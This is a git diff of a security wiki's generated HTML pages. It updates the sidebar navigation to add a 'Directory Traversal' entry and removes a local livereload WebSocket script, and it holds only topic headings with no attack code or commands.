        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Network Address Translation (NAT).html b/docs/Networking/Network Address Translation (NAT).html index 50525abb..68a8c9ef 100644 --- a/docs/Networking/Network Address Translation (NAT).html +++ b/docs/Networking/Network Address Translation (NAT).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Networking/Networks/index.html b/docs/Networking/Networks/index.html index 3bda6053..d8e71a24 100644 --- a/docs/Networking/Networks/index.html +++ b/docs/Networking/Networks/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -178,22 +178,6 @@

Switch

- - diff --git a/docs/Networking/Protocols/Address Resolution Protocol (ARP).html b/docs/Networking/Protocols/Address Resolution Protocol (ARP).html index 79963099..75626fb7 100644 --- a/docs/Networking/Protocols/Address Resolution Protocol (ARP).html +++ b/docs/Networking/Protocols/Address Resolution Protocol (ARP).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
